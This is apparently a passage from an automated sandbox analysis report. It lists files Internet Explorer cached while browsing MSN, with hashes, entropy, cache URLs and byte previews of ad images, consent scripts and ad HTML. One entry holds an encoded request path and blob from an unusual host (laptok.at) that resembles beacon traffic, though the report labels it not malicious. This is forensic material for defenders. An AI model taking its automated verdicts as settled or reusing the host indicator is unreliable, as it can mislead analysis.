speichern","CookiesUsedText":"Verwendete Cookies","AboutLink":"https://go.microsoft.com/fwlink/?LinkId=5

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\http___cdn.taboola.com_libtrc_static_thumbnails_c63444a7cded4449381870b6d61112c8[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	13522
Entropy (8bit):	7.966999489366954
Encrypted:	false
SSDEEP:	384:/sop9DCBQXcTHQSKnsyge6L6Y1FcqN5y/eJRdhjdiZRCx/:/sop9FXVj16Gvm5ymJzh5i0/
MD5:	4744872C88AFB5F305788A6041F034D3
SHA1:	D76714113B516FF4E12604BD9298A15185B9AF28
SHA-256:	1FA6A827B7751CEB4F9F633464D05F5C26D328F54D9FEBE0D07E3FD15A6AB498
SHA-512:	2B09A3093B5955F0ACE4AD09CD9359C3CEB9E5E0D3D09BC578AE5618785D85A3105D06151ABBAA22DEF8DDD77F6520939829F4BFCBED752EBB38EB97728CF99A
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fc63444a7cded4449381870b6d61112c8.png
Preview:	......JFIF..........................................."......".$...$.6&&6>424>LDDL_Z_\|\|.......................- " " -D22D<I;7;I<lUKKUl}ici}................7...............5....................................................................g....w.y.>.w.'.bD[S...~o..T...L?O.....hMf.G.?R....>.f...,..<.3..Z7.D..."..X..Vc.K.......f..r+...7.+.G.....L.c...J...pV.?O.....x..6..;l....v.....J.%a..G..mX1..d.l..qyX........(.x}A4..YH.T.")"'.E..STV....U..b....4n...p...*-......CG-p_..h.0..8P...a6$.cT...t.l..X.._..cG>_>}...U.1P......v...i..ek...M].....1\.q..V.U ......z...=..w....,..Im4...U.T.N{.....s..^t..w...5......,6.z7...%.7..d\..\|.....q....}...o..qz...<.O<..b.n3...,&..w=.3.....lL/X.G...s...<.7....o.1..w..^.>...K;.\|a.l\X......Dl..Y.T..L._q.W..v.I^n7..\|..F..W.\|..q...A..<;l..?...#......._1.........p......V.^2fFl....g....s..5...0...P..f..c...f...j5...S3N.D.m.rP..s...c..". ...q.s......1.,..~....X.A....&....(Q.......tY..T..l..t0...T.......RB.(1B.o...~.LJ5.N...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\https___console.brax-cdn.com_creatives_b9476698-227d-4478-b354-042472d9181c_TB1002-selfie_marco_paul-1200x800_1000x600_35a69fe848aa9c3ef7df36f95cf1c59d[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	10589
Entropy (8bit):	7.965691144927277
Encrypted:	false
SSDEEP:	192:6bfLtAMeG6faNGsN2U0wlWUAU8a+TSOpeUuRVMO/QDoLc9rAKJYoZrMqg/JgI:6bpAMeG6faN/2U0qRYa+OOptuQGL4rAJ
MD5:	4BF5A0D9D414F68B07897DDB578A7F63
SHA1:	4A8EE14F06B3044A74AD83E5CEA973D07DB2A5BD
SHA-256:	161FA25E5807408E63590F1D01CDA860FD9AAD3BBF3A5A36E3F5B592F6DA367D
SHA-512:	501B476E694DBB9237F30DBA407FCE1C6B21D8928C079FAC5F124F35100803B92B0599791FCDA153663AA82F0C4C3E5246314FE4BBA53DA46E12694FB975B90D
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fb9476698-227d-4478-b354-042472d9181c%2FTB1002-selfie_marco_paul-1200x800_1000x600_35a69fe848aa9c3ef7df36f95cf1c59d.png
Preview:	......JFIF...........................................%......%!(!.!(!;/))/;E:7:ESJJSici................................%......%!(!.!(!;/))/;E:7:ESJJSici.........7...."..........4.................................................................P.......\..$!+..J. ......>.U...#.Lr.../Nl..........-I?by..=.1....Z.....4.ZD.."..+&./\..[.Rj...l.=R.O"...yi./w.z...Z...ju....z...bL(r.KD....h<...kl9..AO.D!.FC..=?...m.<O.+6..+.....oJi...cN7".....8....b.....>.D-;.............m.r.{u.U.Z.U.Ra.O....H..6 .B.v..c.....i9...L3..-......O.......N......)C..%#%.f.g..Q...t+...\..5#}8!.u.z....:(..]k..Z...w._:.i.Mii.M;.5-.(Bk.X.x..N\|..i......}..Z..k[..1.Z.).'6D.#.W....1..jU...J.1.H...Z.'..KS..^..Z...j.\...{.,a.$.,j.6.Nx..c ....N.(...91.I..$.....^..keV".X.+...}1..mD...d., ..#]....%WW.4.Z&..`lSD...%.5.V..I..}%..L$..k.0.U...+.%...x........4.n.bU..)C.I....F..Rl..'..=g.eR...]..R...^......+...Y.73IZ`K.0......F.iRmZ..._.f.w.d.z.D.^..:.~.$.$'^.T.......B r...4.R..#)I\..#p...<sN

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\iab2Data[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	180232
Entropy (8bit):	5.115010741936028
Encrypted:	false
SSDEEP:	768:l3JqIWlR2TryukPPnLLuAlGpWAowa8A5NbNQ8nYHv:l3JqIcATDELLxGpEw7Aq8YP
MD5:	EC3D53697497B516D3A5764E2C2D2355
SHA1:	0CDA0F66188EBF363F945341A4F3AA2E6CFE78D3
SHA-256:	2ABD991DABD5977796DB6AE4D44BD600768062D69EE192A4AF2ACB038E13D843
SHA-512:	CC35834574EF3062CCE45792F9755F1FB4B63DDD399A5B44C40555D191411F0B8924E5C2FEFCD08BAC69E1E6D6275E121CABB4A84005288A7452922F94BE5658
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/iab2Data.json
Preview:	{"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\medianet[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	381585
Entropy (8bit):	5.4849605655408515
Encrypted:	false
SSDEEP:	6144:4wl9Tw5qIZvbBH0m9Z3GCVvgz56Cu1b8sFyvrIW:zIZvdP3GCVvg4xVvFUrIW
MD5:	288300D35549023E47D27E4B1EEFCB11
SHA1:	58C34F0D556C65D82799500D4A2F6AED71B885C0
SHA-256:	210D9A57A28502C214A6F71BA9C28CD943F6D95C930F31CDBC70141E62ECCAED
SHA-512:	3EA24CC8EAA32A550BD8A09860F9A0AF447DAA87C54FCEF802EAC8F00EBEB376CF25DFC9A9F90169F3DFA82EC43EA914967852AEB0F6317435D269650071CB37
Malicious:	false
IE Cache URL:	https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Preview:	<html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs\|\|{},window.mnjs.ERP=window.mnjs.ERP\|\|function(){"use strict";for(var a="",l="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function m(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(s=0;s<3;s++)e+=g[s].length;if(0!==e){for(var n,o=new Image,t=f.lurl\|\|"https://lg3-a.akamaihd.net/nerrping.php",r="",i=0,s=2;0<=s;s--){for(e=g[s].length,0;0<e;){if(n=1===s?g[s][0]:{logLevel:g[s][0].logLevel,errorVal:{name:g[s][0].errorVal.name,type:a,svr:l,servname:c,message:g[s][0].errorVal.message,line:g[s][0].errorVal.lineNumber,description:g[s][0].errorVal.description,stack:g[s][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON\|\|"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)).length+r.length<=1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\medianet[2].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	381584
Entropy (8bit):	5.484968989726478
Encrypted:	false
SSDEEP:	6144:4wl9Tw5qIZvbBH0m9Z3GCVvgz56Cu1bssFyvrIW:zIZvdP3GCVvg4xV/FUrIW
MD5:	FEF87668D4548EC93C4C447F3A22C5BD
SHA1:	3AEFE76749AF067142C478C251D34C44C0B88CC5
SHA-256:	EE108EBA26F9C66F9D39BF5FBEE8AF4CE56B9DB63F1ABCE8F75EE8C9C8685F22
SHA-512:	A125E7868F18C2250B832F965D2E61130278003962E488564E13BEDA53D4F0E53480EF89B4C6A24FB839F6670E5545AEE3E845E1F5802D0EB94E191BC6B7E070
Malicious:	false
IE Cache URL:	https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Preview:	<html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs\|\|{},window.mnjs.ERP=window.mnjs.ERP\|\|function(){"use strict";for(var a="",l="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function m(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(s=0;s<3;s++)e+=g[s].length;if(0!==e){for(var n,o=new Image,t=f.lurl\|\|"https://lg3-a.akamaihd.net/nerrping.php",r="",i=0,s=2;0<=s;s--){for(e=g[s].length,0;0<e;){if(n=1===s?g[s][0]:{logLevel:g[s][0].logLevel,errorVal:{name:g[s][0].errorVal.name,type:a,svr:l,servname:c,message:g[s][0].errorVal.message,line:g[s][0].errorVal.lineNumber,description:g[s][0].errorVal.description,stack:g[s][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON\|\|"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)).length+r.length<=1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\otBannerSdk[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	372457
Entropy (8bit):	5.219562494722367
Encrypted:	false
SSDEEP:	6144:B0C8zZ5OVNeBNWabo7QtD+nKmbHgtTVfwBSh:B4zj7BNWaRfh
MD5:	DA186E696CD78BC57C0854179AE8704A
SHA1:	03FCF360CC8D29A6D63BE8073D0E52FFC2BDDB21
SHA-256:	F10DC8CE932F150F2DB28639CF9119144AE979F8209E0AC37BB98D30F6FB718F
SHA-512:	4DE19D4040E28177FD995D56993FFACB9A2A0A7AAB8265BD1BBC7400C565BC73CD61B916D23228496515C237EEA14CCC46839F507879F67BA510D97F46B63557
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otBannerSdk.js
Preview:	/** .. * onetrust-banner-sdk.. * v6.7.0.. * by OneTrust LLC.. * Copyright 2020 .. */..!function () { "use strict"; var o = function (e, t) { return (o = Object.setPrototypeOf \|\| { __proto__: [] } instanceof Array && function (e, t) { e.__proto__ = t } \|\| function (e, t) { for (var o in t) t.hasOwnProperty(o) && (e[o] = t[o]) })(e, t) }; var r = function () { return (r = Object.assign \|\| function (e) { for (var t, o = 1, n = arguments.length; o < n; o++)for (var r in t = arguments[o]) Object.prototype.hasOwnProperty.call(t, r) && (e[r] = t[r]); return e }).apply(this, arguments) }; function l(s, i, a, l) { return new (a = a \|\| Promise)(function (e, t) { function o(e) { try { r(l.next(e)) } catch (e) { t(e) } } function n(e) { try { r(l.throw(e)) } catch (e) { t(e) } } function r(t) { t.done ? e(t.value) : new a(function (e) { e(t.value) }).then(o, n) } r((l = l.apply(s, i \|\| [])).next()) }) } function k(o, n) { var r, s, i, e, a = { label: 0, sent: function () { if (1 & i[0]) throw i[1]

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\otTCF-ie[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	102879
Entropy (8bit):	5.311489377663803
Encrypted:	false
SSDEEP:	768:ONkWT0m7r8N1qpPVsjvB6z4Yj3RCjnugKtLEdT8xJORONTMC5GkkJ0XcJGk58:8kunecpuj5QRCjnrKxJg0TMC5ZW8
MD5:	52F29FAC6C1D2B0BAC8FE5D0AA2F7A15
SHA1:	D66C777DA4B6D1FEE86180B2B45A3954AE7E0AED
SHA-256:	E497A9E7A9620236A9A67F77D2CDA1CC9615F508A392ECCA53F63D2C8283DC0E
SHA-512:	DF33C49B063AEFD719B47F9335A4A7CE38FA391B2ADF5ACFD0C3FE891A5D0ADDF1C3295E6FF44EE08E729F96E0D526FFD773DC272E57C3B247696B79EE1168BA
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otTCF-ie.js
Preview:	!function(){"use strict";var c="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function e(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}function t(e,t){return e(t={exports:{}},t.exports),t.exports}function n(e){return e&&e.Math==Math&&e}function p(e){try{return!!e()}catch(e){return!0}}function E(e,t){return{enumerable:!(1&e),configurable:!(2&e),writable:!(4&e),value:t}}function o(e){return w.call(e).slice(8,-1)}function u(e){if(null==e)throw TypeError("Can't call method on "+e);return e}function l(e){return I(u(e))}function f(e){return"object"==typeof e?null!==e:"function"==typeof e}function i(e,t){if(!f(e))return e;var n,r;if(t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;if("function"==typeof(n=e.valueOf)&&!f(r=n.call(e)))return r;if(!t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;throw TypeError("Can't convert object to primitive value")}function y(e,t){retur

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\tah[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	268392
Entropy (8bit):	5.999917870673771
Encrypted:	false
SSDEEP:	6144:rsSIJzxLtoP1NaM+X+amjSdKZeAiHOBYfLXU8EU:rsSSzxBoP1NkXvZ7H6YzE8l
MD5:	27734CED2BB4E5B559544B4675F790A6
SHA1:	FDAEDB3EA624A20A58EDE3D16D3AB638F6514930
SHA-256:	538E8339A3A5FE5CE03DA5663EC55E6611A3C7286830D6B2C798984142D34E7B
SHA-512:	6EA6D1858749E4221D20750B0272180D751C8F7ACBBAB6EAF2388850593FD02B44AC385D728B7B5BFFAF141077C97AED5E0B51CA647EB79E7403A90F85F27881
Malicious:	false
IE Cache URL:	http://api10.laptok.at/api1/sknLedsCbT_2B4wLtS_2FSf/C8Q4jriZvv/cHfqhQ9vl0vZGO5GP/AoJz8AHspssc/PRZs4sKJRg7/jH1SdHxUwyz5RQ/XuBuvpY5vvQV4LqIVVPRo/Z9PjsLKqohem6vf_/2FPMNyhDVIs00yE/BuUcdk1zY69hPWFKWm/NvZlHdA31/78WizcFNxnStriaFjzK7/v_2FVVwIwtM_2F54f79/vZDSa6ivA8gkZONEyW9488/C4H0pr8tv19LW/ZXxXdBMw/kw85mxmCjJ_2Bu32ObSyLwF/Yo3etxqqFR/p7BRLvnXvFdgAAGGn/C_2BCacpFUZ1/tah
Preview:	Ji3iY3sEebpsDq26uLEavJlq7XxfQiQqIbV8U9eD3tO9TtOOyr6E0VTuE2tpFDkoWVK1EtZaSmDC0GgpGKejMPV2FU6BZN7LvKsQ/Vm9iEP9yMVRtwxunXXRWwO0BV6bowJfmxOm7hHxZff9evNt9q+BzIl87Ym0Ap9rH7/NKDpKBivhY4n262oY0jiehl5J4tBXA8cEdCA1t4Rg01cMjYqo0fnN/CYdISaO1ZqsRdU2r3uYQ7qvKI1zs2fbXG1iLaA3A4Vx5NoadzNPjVAVmDbpWrlNoC0F4uR4gJTkd4AdSpOekbFaOKkApKnRyrrhCLLrQsMyizvmfE8zmLUuIzYTWDAWWZx0e6Fr1z1ENtsnG67YVZQLqFhDE2PsAqTItqxbfLvIPg9ZuXRuhaOQdBpiBlx+y+tmiKKVILHH00/oxz7jMHOabseOMgMFbjsf/K92FcQSA7JFVJHLguRcFnTfqOBrUl+lHaZSyvCrULIzpF5CK69dwfdJ+I9I11+8fu+ILpPE0dYBtSf8BfW1oaZEZ6zOV4KeW7VINyReHQfaoL7qd+Xbd7nidVkotTQCoNxloTxAtFoDd287RGxkoQVkT1ILlr/j4AldS9TWcJuglnsHN/fsiTUoW/u7Y5TdcTIAJnnTbQThPtTMuJd0wMUliN3rIvspWWrJ3WuA3Lb0ra7WhdOdQPU0r+ocVJis5fQ+Uvw/q9NiYhMXCgCf5U2TnYB9DkAeuV87fw1BBMd21Q9UL0+FyYwYpigPlbUQstYPV3hrPfD3qGsoQb6cumoG2kyFcQQAsqsEK2wdNxqP7DXqq0YwAwQlZycM4FzInuC2FfqceWyZXkFxbqWaskdkJpuWLzenWe80+iUFV8zxhGtm1lq0wmdc0/T3s++15BrxQqrK2+p5lI5ok7refG+1WI0bJpn1XOzBzo6cwSV4TvUC2aIW7jCgiqHImYVrt8lgC+dyUdG3BkdEudjvtbw85mTvSk0FZyuFPuY6

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\39ab3103-8560-4a55-bfc4-401f897cf6f2[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
Category:	downloaded
Size (bytes):	64434
Entropy (8bit):	7.97602698071344
Encrypted:	false
SSDEEP:	1536:uvrPk/qeS+g/vzqMMWi/shpcnsdHRpkZRF+wL7NK2cc8d55:uvrsSb7XzB0shpOWpkThLRyc8J
MD5:	F7E694704782A95060AC87471F0AC7EA
SHA1:	F3925E2B2246A931CB81A96EE94331126DEDB909
SHA-256:	DEEBF748D8EBEB50F9DFF0503606483CBD028D255A888E0006F219450AABCAAE
SHA-512:	02FEFF294B6AECDDA9CC9E2289710898675ED8D53B15E6FF0BB090F78BD784381E4F626A6605A8590665E71BFEED7AC703800BA018E6FE0D49946A7A3F431D78
Malicious:	false
IE Cache URL:	https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
Preview:	......JFIF.............C....................................................................C.......................................................................,.,.."...........................................Q............................!.1A."Qaq......#2...$B...3Rb.%CS...&4Tr..(56cs.....................................F......................!...1..AQ"aq.2....BR....#3..Cb....$Sr..&FTc...............?...N..m.1$!..l({&.l...Uw.Wm...i..VK.KWQH.9..n...S~.....@xT.%.D.?....}Nm.;&.....y.qt8...x.2..u.TT.=.TT...k........2..j.J...BS...@'.a....6..S/0.l,.J.r...,<3~...,A....V.G..'....5].....p...#Yb.K.n!'n..w..{o..._........1..I...).(.l.4......z[}.Z....D2.y...o..}.=..+i.=U.....J$.(.IH0.-...uKSUmP..T.5..H.6.....6k,8.E....".n.......pMk+..,q...n)GEUM..UUwO%O...)CJ&.P.2!!..........D.z...W...Q..r.t..6]... U.;m...^..:.k.ZO9...#...q2....mTu..Ej....6.)Se.<......U.@...K.g\D.../..S....~.3 ....hN.."..n...v.?E^,.R<-.Y^)...M.^a.O.R.D...;yo.~..x;u..H.....-.%......].*.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\55a804ab-e5c6-4b97-9319-86263d365d28[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	2830
Entropy (8bit):	4.775944066465458
Encrypted:	false
SSDEEP:	48:Y91lg9DHF6Bjb40UMRBrvdiZv5Gh8aZa6AyYAcHHPk5JKIDrZjSf4ZjfumjVLbf+:yy9Dwb40zrvdip5GHZa6AymsJjxjVj9i
MD5:	46748D733060312232F0DBD4CAD337B3
SHA1:	5AA8AC0F79D77E90A72651E0FED81D0EEC5E3055
SHA-256:	C84D5F2B8855D789A5863AABBC688E081B9CA6DA3B92A8E8EDE0DC947BA4ABC1
SHA-512:	BBB71BE8F42682B939F7AC44E1CA466F8997933B150E63D409B4D72DFD6BFC983ED779FABAC16C0540193AFB66CE4B8D26E447ECF4EF72700C2C07AA700465BE
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/55a804ab-e5c6-4b97-9319-86263d365d28.json
Preview:	{"CookieSPAEnabled":false,"UseV2":true,"MobileSDK":false,"SkipGeolocation":true,"ScriptType":"LOCAL","Version":"6.4.0","OptanonDataJSON":"55a804ab-e5c6-4b97-9319-86263d365d28","GeolocationUrl":"https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location","RuleSet":[{"Id":"6f0cca92-2dda-4588-a757-0e009f333603","Name":"Global","Countries":["pr","ps","pw","py","qa","ad","ae","af","ag","ai","al","am","ao","aq","ar","as","au","aw","az","ba","bb","rs","bd","ru","bf","rw","bh","bi","bj","bl","bm","bn","bo","sa","bq","sb","sc","br","bs","sd","bt","sg","bv","sh","bw","by","sj","bz","sl","sn","so","ca","sr","ss","cc","st","cd","sv","cf","cg","sx","ch","sy","ci","sz","ck","cl","cm","cn","co","tc","cr","td","cu","tf","tg","cv","th","cw","cx","tj","tk","tl","tm","tn","to","tr","tt","tv","tw","dj","tz","dm","do","ua","ug","dz","um","us","ec","eg","eh","uy","uz","va","er","vc","et","ve","vg","vi","vn","vu","fj","fk","fm","fo","wf","ga","ws","gd","ge","gg","gh","gi","gl","gm","gn","gq","gs","gt"

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\755f86[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	390
Entropy (8bit):	7.173321974089694
Encrypted:	false
SSDEEP:	6:6v/lhPZ/SlkR7+RGjVjKM4H56b6z69eG3AXGxQm+cISwADBOwIaqOTp:6v/71IkR7ZjKHHIr8GxQJcISwy0W9
MD5:	D43625E0C97B3D1E78B90C664EF38AC7
SHA1:	27807FBFB316CF79C4293DF6BC3B3DE7F3CFC896
SHA-256:	EF651D3C65005CEE34513EBD2CD420B16D45F2611E9818738FDEBF33D1DA7246
SHA-512:	F2D153F11DC523E5F031B9AA16AA0AB1CCA8BB7267E8BF4FFECFBA333E1F42A044654762404AA135BD50BC7C01826AFA9B7B6F28C24FD797C4F609823FA457B1
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Preview:	.PNG........IHDR..............w=....MIDATH.c...?.6`hhx.......??........g.&hbb....... .R.R.K...x<..w..#!......O ....C..F___x2.....?...y..srr2...1011102.F.(.......Wp1qqq...6mbD..H....=.bt.....,.>}b.....r9........0.../_.DQ....Fj..m....e.2{..+..t~*...z.Els..NK.Z.............e....OJ.... \|..UF.>8[....=...;/.............0.....v...n.bd....9.<.Z.t0......T..A...&....[......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\AAyuliQ[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	435
Entropy (8bit):	7.145242953183175
Encrypted:	false
SSDEEP:	12:6v/78/W/6TKob359YEwQsQP+oaNwGzr5jl39HL0H7YM7:U/6pbJPgQP+bVRt9r0H8G
MD5:	D675AB16BA50C28F1D9D637BBEC7ECFF
SHA1:	C5420141C02C83C3B3A3D3CD0418D3BCEABB306A
SHA-256:	E11816F8F2BBC3DC8B2BE84323D6B781B654E80318DC8D02C35C8D7D81CB7848
SHA-512:	DA3C25D7C998F60291BF94F97A75DE6820C708AE2DF80279F3DA96CC0E647E0EB46E94E54EFFAC4F72BA027D8FB1E16E22FB17CF9AE3E069C2CA5A22F5CC74A4
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs................HIDAT8O.KK.Q.....v...me....H.}.D.............A$.=..=h.J..:..H...;qof?.M........?..gg.j*.X..`/e8.10...T......h..\?..7)q8.MB..u.-...?..G.p.O...0N.!.. .......M............hC.tVzD...+?....Wz}h...8.+<..T._..D.P.p&.0.v....+r8.tg..g .C..a18G...Q.I.=..V1......k...po.+D[^..3SJ.X..x...`..@4..j..1x'.h.V....3..48.{$BZW.z.>....w4~.`..m....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB14EN7h[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 192x192, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	downloaded
Size (bytes):	10663
Entropy (8bit):	7.715872615198635
Encrypted:	false
SSDEEP:	192:BpV23EiAqPWo2rhmHI2NF5IZr9Q8yES4+e5B0k9F8OdqmQzMs:7PiAqnHICF5IVVyxk5BB9tdq3Z
MD5:	A1ED4EB0C8FE2739CE3CB55E84DBD10F
SHA1:	7A185F8FF5FF1EC11744B44C8D7F8152F03540D5
SHA-256:	17917B48CF2575A9EA5F845D8221BFBC2BA2C039B2F3916A3842ECF101758CCB
SHA-512:	232AE7AB9D6684CDF47E73FB15B0B87A32628BAEEA97709EA88A24B6594382D1DF957E739E7619EC8E8308D5912C4B896B329940D6947E74DCE7FC75D71C6842
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB14EN7h.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...E.(.Y....E.D....=h...<t.S......5i..9.. .:..".R..i...dt&..J..!...P..m&..5`VE..\|..j.d...i..qL=x...4.S@..u.4.J.u.....Ju%.FEU..I.*.]#4.3@.6...yH...=..}.#....bx...1s...O.....7R....."U...........jY.'.L.0..ST.M.:t3...9...2.:.0$...V..A..w..o..T.Y#...=).K..+.....XV...n;......}.37.........:.!E.P.E%...RQ@.E%...RQ@.E%...RQ@.E%...RQ@.E%...RQ@.E%...RQ@.E%...RQ@.E%-...uE,.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB17milU[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	627
Entropy (8bit):	7.4822519699232695
Encrypted:	false
SSDEEP:	12:6v/78/W/6TiIP7X0TFI8uqNN9pEsGCLDOk32Se5R2bBCEYPk79kje77N:U/6xPT0TtNNDGCLDOMVe5JEAkv3N
MD5:	DDE867EA1D9D8587449D8FA9CBA6CB71
SHA1:	1A8B95E13686068DD73FDCDD8D9B48C640A310C4
SHA-256:	3D5AD319A63BCC4CD963BDDCF0E6A629A40CC45A9FB14DEFBB3F85A17FCC20B2
SHA-512:	83E4858E9B90B4214CDA0478C7A413123402AD53C1539F101A094B24C529FB9BFF279EEFC170DA2F1EE687FEF1BC97714A26F30719F271F12B8A5FA401732847
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
